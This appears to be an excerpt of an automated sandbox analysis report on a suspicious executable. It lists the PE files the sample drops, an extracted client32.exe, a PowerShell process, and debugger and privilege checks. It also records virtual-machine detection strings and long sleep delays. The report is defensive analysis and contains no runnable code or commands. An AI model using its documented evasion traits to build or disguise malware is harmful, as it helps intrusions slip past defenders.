                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_webp.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\psutil\_psutil_windows.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_lzma.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_decimal.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_socket.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\_ssl.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-sysinfo-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-kernel32-legacy-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI74282\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18090
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeAPI coverage: 1.9 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI coverage: 3.4 %
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3431C06_2_6C3431C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe TID: 7648Thread sleep time: -131250s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe TID: 7648Thread sleep time: -2269250s >= -30000sJump to behavior
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C3413F0 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C3414DCh6_2_6C3413F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF92F0 FindFirstFileExW,FindClose,0_2_00007FF748AF92F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF748AF83B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF92F0 FindFirstFileExW,FindClose,1_2_00007FF748AF92F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF748AF83B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF748B118E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01370340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFE01370340
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE01340DA8 FindFirstFileExW,GetLastError,1_2_00007FFE01340DA8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE013F260C FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFE013F260C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ACA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6C5ACA9B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6C5AC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C577C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C577C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6C5ADF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6C5ADA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6C5AD4FF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,1_2_00007FFE10302E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE103018C0 PyModule_Create2,getenv,RtlGetVersion,GetSystemInfo,InitializeCriticalSection,PyModule_GetState,PyErr_NewException,_Py_Dealloc,PyErr_NewException,PyModule_AddObject,PyErr_NewException,PyModule_AddObject,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,1_2_00007FFE103018C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: BUenB12U2a.exe, 00000000.00000003.1717235436.0000021D68864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: client32.exeBinary or memory string: VMware
                                Source: BUenB12U2a.exe, 00000001.00000003.1797337365.0000021011130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: BUenB12U2a.exe, 00000001.00000003.1743678024.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1955073011.0000021010BA4000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1933279770.0000021010B8B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1930611882.0000021010B63000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1796873239.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1747967588.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1745222625.0000021010B8F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1746907747.0000021010B5F000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1941673219.0000021010B90000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1944525379.0000021010B92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748AFD19C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5D6C74 VirtualProtect ?,-00000001,00000104,?6_2_6C5D6C74
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B134F0 GetProcessHeap,0_2_00007FF748B134F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748AFD19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFD37C SetUnhandledExceptionFilter,0_2_00007FF748AFD37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748B0A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF748B0A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF748AFC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF748AFC910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF748AFD19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFD37C SetUnhandledExceptionFilter,1_2_00007FF748AFD37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748B0A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF748B0A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF748AFC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF748AFC910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFACB2A7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFACB2A7C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFACB3034 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFACB3034
